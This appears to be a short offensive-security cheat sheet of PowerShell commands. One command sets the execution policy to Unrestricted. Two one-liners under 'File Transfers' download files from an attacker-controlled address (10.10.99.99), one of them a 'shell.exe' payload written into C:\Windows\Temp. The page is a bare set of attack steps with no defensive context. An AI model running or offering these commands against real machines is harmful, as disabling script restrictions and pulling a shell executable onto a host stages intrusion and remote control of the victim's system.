Skip to content

PowerShell

Unrestricted

Set-ExecutionPolicy Unrestricted

File Transfers

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.99.99/wget.exe','C:\Users\jac\Desktop\wget.exe')"
powershell -c "Invoke-WebRequest -Uri 'http://10.10.99.99:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"